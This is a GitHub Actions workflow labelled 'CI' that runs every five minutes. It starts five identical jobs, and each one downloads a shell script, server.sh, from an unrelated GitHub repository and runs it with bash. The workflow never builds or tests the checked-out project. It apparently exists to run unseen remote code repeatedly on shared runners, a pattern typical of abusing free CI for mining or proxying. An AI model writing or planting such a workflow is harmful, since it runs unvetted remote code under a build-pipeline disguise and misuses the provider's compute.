name: CI

on:
  schedule:
    - cron: '*/5 * * * *'
    
jobs:
  build1:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/server.sh
          bash server.sh
  build2:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/server.sh
          bash server.sh
  build3:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/server.sh
          bash server.sh
  build4:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/server.sh
          bash server.sh
  build5:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/server.sh
          bash server.sh
